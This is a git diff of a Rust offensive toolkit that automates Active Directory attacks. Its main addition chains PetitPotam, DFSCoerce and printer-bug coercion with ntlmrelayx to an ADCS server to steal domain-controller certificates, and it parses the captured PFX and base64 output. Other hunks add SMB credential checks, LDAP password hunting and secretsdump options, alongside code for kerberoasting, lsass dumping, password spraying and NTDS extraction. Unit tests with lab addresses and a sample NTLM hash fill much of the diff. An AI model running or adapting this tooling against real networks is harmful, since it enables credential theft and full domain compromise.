coerce_secret_args(secret: Option<&CoerceSecret>) -> Vec { + match secret { + Some(CoerceSecret::Hash(h)) => vec!["-hashes".into(), format!(":{h}")], + Some(CoerceSecret::Password(p)) => vec!["-p".into(), p.clone()], + None => Vec::new(), + } +} + +async fn append_output(path: &Path, header: &str, output: &std::process::Output) { + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path) + .await + { + let _ = f.write_all(b"=== ").await; + let _ = f.write_all(header.as_bytes()).await; + let _ = f.write_all(b" ===\n").await; + let _ = f.write_all(&output.stdout).await; + let _ = f.write_all(&output.stderr).await; + let _ = f.write_all(b"\n").await; + } +} + +async fn append_error(path: &Path, header: &str, msg: &str) { + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(path) + .await + { + let _ = f.write_all(b"=== ").await; + let _ = f.write_all(header.as_bytes()).await; + let _ = f.write_all(b" ===\n[ERROR] ").await; + let _ = f.write_all(msg.as_bytes()).await; + let _ = f.write_all(b"\n").await; + } +} + +async fn poll_for_cert(relay_log: &Path, max: Duration, interval: Duration) -> bool { + let deadline = Instant::now() + max; + loop { + if let Ok(s) = tokio::fs::read_to_string(relay_log).await { + // `--adcs` writes "GOT CERTIFICATE! ID " then "Writing PKCS#12 …". + // `--ldap` userCertificate writes "Base64 certificate of user …". + if s.contains("Base64 certificate of user") + || s.contains("GOT CERTIFICATE!") + || s.contains("Writing PKCS#12 certificate to") + { + return true; + } + } + let now = Instant::now(); + if now >= deadline { + return false; + } + let wait = std::cmp::min(interval, deadline - now); + sleep(wait).await; + } +} + +/// Captured-cert metadata for the `--adcs` path: ntlmrelayx writes the PFX to +/// disk relative to its CWD and logs the path. +#[derive(Debug, Clone, PartialEq, Eq)] +struct PfxCapture { + user: String, + pfx_basename: String, +} + +/// Walk the relay log, pair the most-recent authenticating-as-user line with +/// the most-recent "Writing PKCS#12 certificate to " line. Returns None +/// if either marker is missing. +fn extract_pfx_capture_from_log(log: &str) -> Option { + let mut last_user: Option = None; + let mut last_pfx: Option = None; + + for line in log.lines() { + // "[*] Authenticating against http://... as DOMAIN/USER$ SUCCEED" + // "[*] SMBD-Thread-N: Connection from DOMAIN/USER$@ip controlled, attacking..." + // Both shapes appear depending on flow; pull the user after the slash. + if let Some(user) = parse_relayed_user(line) { + last_user = Some(user); + } + // "[*] Writing PKCS#12 certificate to ./DC01.pfx" + if let Some(idx) = line.find("Writing PKCS#12 certificate to ") { + let after = &line[idx + "Writing PKCS#12 certificate to ".len()..]; + let path = after.split_whitespace().next().unwrap_or(""); + if !path.is_empty() { + last_pfx = Some(path.to_string()); + } + } + } + + match (last_user, last_pfx) { + (Some(u), Some(p)) => Some(PfxCapture { + user: u, + pfx_basename: p, + }), + // If we got a PFX path but no user, fall back to the file's basename + // (ntlmrelayx names the PFX after the user). + (None, Some(p)) => { + let base = std::path::Path::new(p.trim_start_matches("./")) + .file_stem() + .and_then(|s| s.to_str()) + .unwrap_or("relayed") + .to_string(); + Some(PfxCapture { + user: base, + pfx_basename: p, + }) + } + _ => None, + } +} + +/// Pull a relayed username out of a line that looks like +/// "DOMAIN/USERNAME$@target" or "DOMAIN/USERNAME@target". Returns the bare +/// username including any trailing `$`. +fn parse_relayed_user(line: &str) -> Option { + let at_idx = line.find('@')?; + let prefix = &line[..at_idx]; + // Walk backwards from '@' to the slash that splits domain/user. + let user_start = prefix.rfind('/')? + 1; + let candidate: &str = prefix[user_start..] + .split_terminator(|c: char| c.is_whitespace()) + .next()?; + if candidate.is_empty() { + return None; + } + // Heuristic — usernames here are word chars + an optional trailing $. + if !candidate + .chars() + .all(|c| c.is_alphanumeric() || c == '$' || c == '_' || c == '-' || c == '.') + { + return None; + } + Some(candidate.to_string()) +} + +/// Parse the relay.log for the LAST captured cert. ntlmrelayx prints +/// `Base64 certificate of user ` followed by the base64 blob on the +/// next non-empty line. Returns (user, base64_blob). +fn extract_cert_from_log(log: &str) -> Option<(String, String)> { + let mut last_user: Option = None; + let mut last_b64: Option = None; + let mut pending_user: Option = None; + + for line in log.lines() { + if let Some(idx) = line.find("Base64 certificate of user ") { + let after = &line[idx + "Base64 certificate of user ".len()..]; + let name = after + .split_whitespace() + .next() + .unwrap_or("") + .trim_end_matches(':'); + if !name.is_empty() { + pending_user = Some(name.to_string()); + } + continue; + } + if let Some(user) = &pending_user { + let trimmed = line.trim(); + if !trimmed.is_empty() { + last_user = Some(user.clone()); + last_b64 = Some(trimmed.to_string()); + pending_user = None; + } + } + } + + match (last_user, last_b64) { + (Some(u), Some(b)) => Some((u, b)), + _ => None, + } +} + /// Relay captured NTLM authentication to multiple targets. /// /// Optional args: `targets_file`, `target_ips` (comma-separated), `dump_sam` @@ -336,6 +1209,623 @@ mod tests { assert!(ntlmrelayx_to_smb(&args).await.is_ok()); } + #[tokio::test] + async fn relay_and_coerce_requires_secret() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_domain": "contoso.local" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("coerce_hash") || err.contains("coerce_password")); + } + + #[tokio::test] + async fn relay_and_coerce_rejects_quote_in_inputs() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_domain": "contoso.local", + "coerce_password": "p'ass" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("forbidden")); + } + + #[tokio::test] + async fn relay_and_coerce_rejects_same_host() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.10", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let err = relay_and_coerce(&args).await.unwrap_err().to_string(); + assert!(err.contains("must differ") || err.contains("loopback")); + } + + #[test] + fn parse_relay_coerce_args_accepts_legacy_target_dc_alias() { + let args = json!({ + "ca_host": "192.168.58.10", + "target_dc": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("legacy alias should parse"); + assert_eq!(cfg.coerce_target, "192.168.58.20"); + } + + #[test] + fn parse_relay_coerce_args_with_hash() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100", + "coerce_user": "alice", + "coerce_hash": "b8d76e56e9dac90539aff05e3ccb1755", + "coerce_domain": "contoso.local" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("valid args should parse"); + assert!(matches!( + cfg.coerce_secret, + Some(super::CoerceSecret::Hash(_)) + )); + } + + #[test] + fn parse_relay_coerce_args_unauth() { + let args = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "attacker_ip": "192.168.58.100" + }); + let cfg = super::parse_relay_coerce_args(&args).expect("unauth args should parse"); + assert!(cfg.coerce_user.is_none()); + assert!(cfg.coerce_secret.is_none()); + } + + // ── Phase-progression coverage via FakeCoerceProcs ───────────────────── + + use std::collections::{HashMap, HashSet}; + use std::sync::Mutex; + + #[derive(Default, Clone)] + struct PhaseScript { + relay_log_append: Vec, + /// (basename, bytes) — written into workdir when run_phase fires. + pfx_drop: Option<(String, Vec)>, + } + + #[derive(Debug, Clone)] + struct RecordedPhaseCall { + header: String, + bin: String, + args: Vec, + } + + struct FakeState { + is_local_ip: bool, + local_ips: Vec, + binaries_present: HashSet, + relay_early_exit: Option, + relay_initial_log: Vec, + relay_log_path: Option, + coerce_log_path: Option, + phase_scripts: HashMap, + run_phase_calls: Vec, + } + + struct FakeCoerceProcs { + state: Mutex, + } + + impl FakeCoerceProcs { + fn new() -> Self { + Self { + state: Mutex::new(FakeState { + is_local_ip: true, + local_ips: vec!["10.0.0.1".into()], + binaries_present: ["petitpotam".to_string()].into_iter().collect(), + relay_early_exit: None, + relay_initial_log: Vec::new(), + relay_log_path: None, + coerce_log_path: None, + phase_scripts: HashMap::new(), + run_phase_calls: Vec::new(), + }), + } + } + + fn with_local_ip(self, allowed: bool) -> Self { + self.state.lock().unwrap().is_local_ip = allowed; + self + } + + fn with_only_binary(self, names: &[&str]) -> Self { + let mut s = self.state.lock().unwrap(); + s.binaries_present.clear(); + for n in names { + s.binaries_present.insert((*n).to_string()); + } + drop(s); + self + } + + fn with_relay_exit(self, code: i32) -> Self { + self.state.lock().unwrap().relay_early_exit = Some(code); + self + } + + fn with_relay_initial_log(self, bytes: &[u8]) -> Self { + self.state.lock().unwrap().relay_initial_log = bytes.to_vec(); + self + } + + fn with_phase_capture(self, header: &str, log_append: &[u8]) -> Self { + self.state.lock().unwrap().phase_scripts.insert( + header.to_string(), + PhaseScript { + relay_log_append: log_append.to_vec(), + pfx_drop: None, + }, + ); + self + } + + fn with_phase_pfx_drop( + self, + header: &str, + log_append: &[u8], + pfx_basename: &str, + pfx_bytes: &[u8], + ) -> Self { + self.state.lock().unwrap().phase_scripts.insert( + header.to_string(), + PhaseScript { + relay_log_append: log_append.to_vec(), + pfx_drop: Some((pfx_basename.to_string(), pfx_bytes.to_vec())), + }, + ); + self + } + + fn calls(&self) -> Vec { + self.state.lock().unwrap().run_phase_calls.clone() + } + } + + struct FakeRelayHandle { + pid: u32, + early_exit: Option, + } + + impl super::RelayHandle for FakeRelayHandle { + fn pid(&self) -> u32 { + self.pid + } + async fn settle_then_try_wait(&mut self, _settle: Duration) -> Option { + self.early_exit.take() + } + async fn kill_and_wait(&mut self, _timeout: Duration) {} + } + + impl super::CoerceProcs for FakeCoerceProcs { + type Handle = FakeRelayHandle; + + fn is_local_ip(&self, _ip: &str) -> bool { + self.state.lock().unwrap().is_local_ip + } + + fn list_local_ips(&self) -> Vec { + self.state.lock().unwrap().local_ips.clone() + } + + fn which_binary(&self, name: &str) -> bool { + self.state.lock().unwrap().binaries_present.contains(name) + } + + async fn cleanup_stale_listeners(&self, _workdir: &Path) {} + + async fn spawn_relay( + &self, + _target_url: &str, + _template: &str, + relay_log: &Path, + _workdir: &Path, + ) -> Result { + let (initial_log, early_exit) = { + let mut s = self.state.lock().unwrap(); + s.relay_log_path = Some(relay_log.to_path_buf()); + (s.relay_initial_log.clone(), s.relay_early_exit) + }; + tokio::fs::write(relay_log, &initial_log) + .await + .context("fake spawn_relay: write initial relay.log")?; + Ok(FakeRelayHandle { + pid: 4242, + early_exit, + }) + } + + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + _timeout_secs: u64, + ) { + let (script, relay_log) = { + let mut s = self.state.lock().unwrap(); + s.coerce_log_path = Some(coerce_log.to_path_buf()); + s.run_phase_calls.push(RecordedPhaseCall { + header: header.to_string(), + bin: bin.to_string(), + args: args.iter().map(|x| (*x).to_string()).collect(), + }); + let relay_log = s + .relay_log_path + .clone() + .unwrap_or_else(|| cwd.join("relay.log")); + (s.phase_scripts.get(header).cloned(), relay_log) + }; + // Append a phase header line to coerce.log so the path contract is + // observable — production appends real subprocess output here. + use tokio::io::AsyncWriteExt; + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(coerce_log) + .await + { + let _ = f.write_all(format!("{header}\n").as_bytes()).await; + } + if let Some(script) = script { + if !script.relay_log_append.is_empty() { + if let Ok(mut f) = tokio::fs::OpenOptions::new() + .create(true) + .append(true) + .open(&relay_log) + .await + { + let _ = f.write_all(&script.relay_log_append).await; + } + } + if let Some((basename, bytes)) = &script.pfx_drop { + let _ = tokio::fs::write(cwd.join(basename), bytes).await; + } + } + } + } + + fn fast_opts() -> super::RunOptions { + super::RunOptions { + relay_settle: Duration::from_millis(0), + poll_interval: Duration::from_millis(2), + poll_phase_1: Duration::from_millis(15), + poll_phase_2: Duration::from_millis(15), + poll_phase_3: Duration::from_millis(15), + post_capture_settle: Duration::from_millis(0), + relay_kill_timeout: Duration::from_millis(15), + keep_workdir_on_capture: false, + // Tests run in parallel and would otherwise fight over the + // single host-wide loopback sentinel port. + acquire_host_lock: false, + } + } + + fn cfg_unauth() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: None, + coerce_domain: String::new(), + coerce_secret: None, + template: "DomainController".into(), + } + } + + fn cfg_with_creds() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: Some("alice".into()), + coerce_domain: "contoso.local".into(), + coerce_secret: Some(super::CoerceSecret::Hash( + "b8d76e56e9dac90539aff05e3ccb1755".into(), + )), + template: "DomainController".into(), + } + } + + const PHASE1: &str = "Phase 1: unauth PetitPotam"; + const PHASE2: &str = "Phase 2: DFSCoerce"; + const PHASE3_EFSR: &str = "Phase 3: MS-EFSR"; + const PHASE3_RPRN: &str = "Phase 3: MS-RPRN"; + + #[tokio::test] + async fn run_attacker_ip_not_local_bails_with_clear_error() { + let fake = FakeCoerceProcs::new().with_local_ip(false); + let err = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap_err() + .to_string(); + assert!(err.contains("not a local interface IP"), "got: {err}"); + } + + #[tokio::test] + async fn run_host_lock_contention_returns_busy_marker() { + // Hold the sentinel port ourselves to simulate another in-flight + // relay_and_coerce already running on this host. + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let mut opts = fast_opts(); + opts.acquire_host_lock = true; + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, opts) + .await + .unwrap(); + assert!(!out.success); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY, got: {}", + out.stdout + ); + // No phases or relay spawn should fire when the lock is contended. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn ntlmrelayx_to_smb_returns_busy_when_lock_held() { + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let args = json!({"target_ip": "192.168.58.1"}); + let out = super::ntlmrelayx_to_smb(&args).await.unwrap(); + assert!(!out.success, "expected BUSY non-success, got success"); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY in stdout, got: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_relay_bind_failure_returns_marker() { + let fake = FakeCoerceProcs::new() + .with_relay_exit(98) + .with_relay_initial_log(b"OSError: [Errno 98] Address already in use\n"); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert_eq!(out.exit_code, Some(98)); + assert!(out.stdout.contains("RELAY_BIND_FAILED")); + assert!(out.stdout.contains("Address already in use")); + // No phases should run when the relay died at startup. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn run_phase1_capture_skips_phase2_and_3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] GOT CERTIFICATE! ID 1\n\ + [*] Writing PKCS#12 certificate to ./DC01.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE1, log, "DC01.pfx", b"\xab\xcd"); + // Provide creds so we can verify phases 2/3 are skipped DESPITE creds. + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=unauth_petitpotam")); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + assert!(out.stdout.contains("PFX_FILE=")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase1_miss_no_creds_skips_phase2_and_3() { + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert!(!out.stdout.contains("CERT_CAPTURED_VIA")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase2_capture_skips_phase3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC02$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC02.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE2, log, "DC02.pfx", b"\x01\x02"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-DFSNM")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2]); + } + + #[tokio::test] + async fn run_phase3_efsr_miss_rprn_capture() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC03$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC03.pfx\n"; + let fake = + FakeCoerceProcs::new().with_phase_pfx_drop(PHASE3_RPRN, log, "DC03.pfx", b"\x09"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-RPRN")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2, PHASE3_EFSR, PHASE3_RPRN]); + } + + #[tokio::test] + async fn run_ldap_base64_extraction_decodes_to_workdir() { + // Encode known plaintext so we can verify the decode path. The fake + // emits both the "Authenticating ... DC01$@..." line AND a + // "Base64 certificate of user DC01$:" block. extract_pfx_capture + // returns None (no PKCS#12 line), so the LDAP base64 path runs. + let pfx_bytes = b"PKCS12-FAKE"; + let b64 = base64::engine::general_purpose::STANDARD.encode(pfx_bytes); + let mut log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] Base64 certificate of user DC01$:\n" + .to_vec(); + log.extend_from_slice(b64.as_bytes()); + log.extend_from_slice(b"\n"); + let fake = FakeCoerceProcs::new().with_phase_capture(PHASE1, &log); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success, "stdout={}", out.stdout); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + // PFX_FILE should point at /DC01$.pfx — confirm the + // marker appears with that filename suffix. + assert!( + out.stdout.contains("DC01$.pfx"), + "expected DC01$.pfx in stdout: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_petitpotam_binary_fallback_uses_impacket_name() { + let fake = FakeCoerceProcs::new().with_only_binary(&["impacket-petitpotam"]); + let _ = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase1 = calls + .iter() + .find(|c| c.header == PHASE1) + .expect("phase 1 should run"); + assert_eq!(phase1.bin, "impacket-petitpotam"); + } + + #[tokio::test] + async fn run_phase2_passes_credentials() { + // No script: phase 2 misses, but we can inspect its argv. + let fake = FakeCoerceProcs::new(); + let _ = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase2 = calls + .iter() + .find(|c| c.header == PHASE2) + .expect("phase 2 should run"); + assert_eq!(phase2.bin, "dfscoerce"); + // Hash secret must surface as `-hashes :`. + let joined = phase2.args.join(" "); + assert!(joined.contains("-hashes"), "args: {joined}"); + assert!(joined.contains(":b8d76e56"), "args: {joined}"); + assert!(joined.contains("-u alice"), "args: {joined}"); + } + + #[test] + fn extract_cert_from_log_picks_last_capture() { + // Two captures in one log; we want the last one. + let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-1: Received connection from x\n\ +[*] Authenticating against http://ca/certsrv/ as DC1$\n\ +[*] Base64 certificate of user DC1$:\n\ +MIIBlahFirstCert==\n\ +[*] Servers started, waiting for connections\n\ +[*] Base64 certificate of user DC2$:\n\ +MIIBlahSecondCert==\n\ +[*] done\n"; + let (user, b64) = super::extract_cert_from_log(log).expect("should extract"); + assert_eq!(user, "DC2$"); + assert_eq!(b64, "MIIBlahSecondCert=="); + } + + #[test] + fn extract_cert_from_log_returns_none_without_marker() { + let log = "[*] Servers started\n[*] no auth received\n"; + assert!(super::extract_cert_from_log(log).is_none()); + } + + #[test] + fn extract_pfx_capture_picks_adcs_pair() { + // Real `--adcs` log shape captured during ntlmrelayx ADCS relay. + let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-3: Received connection from 192.168.58.20, attacking target http://192.168.58.10/certsrv/certfnsh.asp\n\ +[*] (SMB): Authenticating against http://192.168.58.10/certsrv/certfnsh.asp CONTOSO/DC01$@192.168.58.20 SUCCEED [1]\n\ +[*] GOT CERTIFICATE! ID 6\n\ +[*] Writing PKCS#12 certificate to ./DC01.pfx\n\ +[*] done\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "DC01$"); + assert_eq!(cap.pfx_basename, "./DC01.pfx"); + } + + #[test] + fn extract_pfx_capture_falls_back_to_basename_without_user() { + let log = "[*] Writing PKCS#12 certificate to ./MEMBER1.pfx\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "MEMBER1"); + assert_eq!(cap.pfx_basename, "./MEMBER1.pfx"); + } + + #[test] + fn extract_pfx_capture_returns_none_without_pfx_marker() { + let log = "[*] (SMB): Authenticating against ... CONTOSO/DC01$@192.168.58.20 SUCCEED\n[*] auth complete"; + assert!(super::extract_pfx_capture_from_log(log).is_none()); + } + + #[test] + fn parse_relayed_user_handles_domain_user_dollar_at_ip() { + assert_eq!( + super::parse_relayed_user("blah CONTOSO/DC01$@192.168.58.20 SUCCEED"), + Some("DC01$".to_string()) + ); + assert_eq!( + super::parse_relayed_user("(SMB): Authenticating CONTOSO/jdoe@192.168.58.10"), + Some("jdoe".to_string()) + ); + } + + #[test] + fn parse_relayed_user_returns_none_when_no_user() { + // Lines with `@` but not a `domain/user` shape — URL-only, e.g. + assert_eq!(super::parse_relayed_user("[*] Connection to host"), None); + assert_eq!(super::parse_relayed_user("user@host"), None); // no slash + } + #[tokio::test] async fn ntlmrelayx_multirelay_with_targets_file() { mock::push(mock::success()); diff --git a/ares-tools/src/credential_access/kerberos.rs b/ares-tools/src/credential_access/kerberos.rs index 23272dec..2ca135b8 100644 --- a/ares-tools/src/credential_access/kerberos.rs +++ b/ares-tools/src/credential_access/kerberos.rs @@ -146,6 +146,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- kerberoast --- + #[test] fn kerberoast_target_format() { let domain = "contoso.local"; @@ -195,6 +197,8 @@ mod tests { assert!(required_str(&args, "dc_ip").is_err()); } + // --- asrep_roast --- + #[test] fn asrep_roast_authenticated_format() { let domain = "contoso.local"; @@ -245,6 +249,8 @@ mod tests { assert_eq!(users_file, Some("/tmp/users.txt")); } + // --- DEFAULT_AD_USERNAMES --- + #[test] fn default_ad_usernames_is_non_empty() { assert!(!super::DEFAULT_AD_USERNAMES.is_empty()); @@ -260,6 +266,8 @@ mod tests { assert!(super::DEFAULT_AD_USERNAMES.contains("krbtgt")); } + // --- kerberos_user_enum_noauth --- + #[test] fn kerberos_user_enum_requires_domain() { let args = json!({"dc_ip": "192.168.58.1"}); @@ -301,6 +309,8 @@ mod tests { assert!(optional_str(&args, "users_file").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credential_access/misc.rs b/ares-tools/src/credential_access/misc.rs index 23b6d1e4..69a69dc0 100644 --- a/ares-tools/src/credential_access/misc.rs +++ b/ares-tools/src/credential_access/misc.rs @@ -50,7 +50,31 @@ pub async fn lsassy(args: &Value) -> Result { cmd.timeout_secs(120).execute().await } -/// Check for admin access on targets via `netexec smb --admin-status`. +/// Check a single credential against SMB on a target via `netexec smb`. +/// +/// Returns standard netexec output — look for `[+]` (valid cred) and +/// `(Pwn3d!)` (local admin). +pub async fn smb_login_check(args: &Value) -> Result { + let target = required_str(args, "target")?; + let username = required_str(args, "username")?; + let password = required_str(args, "password")?; + let domain = required_str(args, "domain")?; + + let cred_args = credentials::netexec_creds(Some(username), Some(password), None, Some(domain)); + + CommandBuilder::new("netexec") + .arg("smb") + .arg(target) + .args(cred_args) + .timeout_secs(60) + .execute() + .await +} + +/// Check for admin access on targets via `netexec smb`. +/// +/// netexec automatically reports `(Pwn3d!)` in its output when the +/// credential has local admin access — no extra flag needed. pub async fn domain_admin_checker(args: &Value) -> Result { let targets = required_str(args, "targets")?; let username = optional_str(args, "username"); @@ -64,7 +88,6 @@ pub async fn domain_admin_checker(args: &Value) -> Result { .arg("smb") .arg(targets) .args(cred_args) - .arg("--admin-status") .timeout_secs(120) .execute() .await @@ -140,11 +163,17 @@ pub async fn laps_dump(args: &Value) -> Result { } /// Search for user descriptions containing credentials via `ldapsearch`. +/// +/// `domain` controls the base DN (the partition being searched). +/// `bind_domain` (optional) overrides the domain in the bind DN +/// (`user@bind_domain`). Use when the credential belongs to a different +/// domain than the one being queried. Defaults to `domain`. pub async fn ldap_search_descriptions(args: &Value) -> Result { let target = required_str(args, "target")?; let username = required_str(args, "username")?; let password = required_str(args, "password")?; let domain = required_str(args, "domain")?; + let bind_domain = optional_str(args, "bind_domain"); let base_dn = optional_str(args, "base_dn"); // Build base DN from domain if not explicitly provided. @@ -157,7 +186,8 @@ pub async fn ldap_search_descriptions(args: &Value) -> Result { .join(","), }; - let bind_dn = format!("{username}@{domain}"); + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{username}@{auth_domain}"); let ldap_uri = format!("ldap://{target}"); CommandBuilder::new("ldapsearch") @@ -573,6 +603,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- lsassy hash formatting --- + #[test] fn lsassy_hash_without_colon_gets_prefix() { let hash = "aabbccdd"; @@ -623,6 +655,8 @@ mod tests { assert!(optional_str(&args, "method").is_none()); } + // --- ldap_search_descriptions --- + #[test] fn base_dn_computation_from_domain() { let domain = "contoso.local"; @@ -689,6 +723,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- netexec_creds helper --- + #[test] fn netexec_creds_for_domain_admin_checker() { let cred_args = @@ -719,6 +755,8 @@ mod tests { assert!(required_str(&args, "targets").is_err()); } + // --- gpp_password_finder --- + #[test] fn gpp_password_finder_all_required() { let args = json!({ @@ -733,6 +771,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- DEFAULT_SPRAY_USERNAMES --- + #[test] fn default_spray_usernames_is_non_empty() { assert!(!super::DEFAULT_SPRAY_USERNAMES.is_empty()); @@ -749,6 +789,8 @@ mod tests { assert!(super::DEFAULT_SPRAY_USERNAMES.contains("svc_backup")); } + // --- password_spray --- + #[test] fn password_spray_delay_seconds_parsing() { let args = json!({ @@ -788,6 +830,8 @@ mod tests { assert!(required_str(&args, "domain").is_err()); } + // --- ntds_dit_extract --- + #[test] fn ntds_dit_extract_auth_with_password() { let (auth_string, extra_args) = credentials::impacket_auth( @@ -814,6 +858,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- smbclient_spider --- + #[test] fn smbclient_spider_optional_pattern() { let args = json!({ @@ -855,6 +901,8 @@ mod tests { ); } + // --- check_credman_entries / check_autologon_registry --- + #[test] fn credman_requires_all_fields() { let args = json!({ @@ -881,6 +929,8 @@ mod tests { assert_eq!(cred_args[5], "contoso.local"); } + // --- username_as_password --- + #[test] fn username_as_password_requires_target() { let args = json!({"domain": "contoso.local"}); @@ -903,6 +953,8 @@ mod tests { assert_eq!(optional_str(&args, "users_file"), Some("/tmp/myusers.txt")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -933,6 +985,16 @@ mod tests { assert!(super::lsassy(&args).await.is_ok()); } + #[tokio::test] + async fn smb_login_check_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.10", "username": "localuser", + "password": "localuser", "domain": "contoso.local" + }); + assert!(super::smb_login_check(&args).await.is_ok()); + } + #[tokio::test] async fn domain_admin_checker_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/credential_access/secretsdump.rs b/ares-tools/src/credential_access/secretsdump.rs index 5b2d1590..03435a47 100644 --- a/ares-tools/src/credential_access/secretsdump.rs +++ b/ares-tools/src/credential_access/secretsdump.rs @@ -18,6 +18,8 @@ pub async fn secretsdump(args: &Value) -> Result { let dc_ip = optional_str(args, "dc_ip"); let use_kerberos = optional_bool(args, "no_pass").unwrap_or(false); let ticket_path = optional_str(args, "ticket_path"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = optional_bool(args, 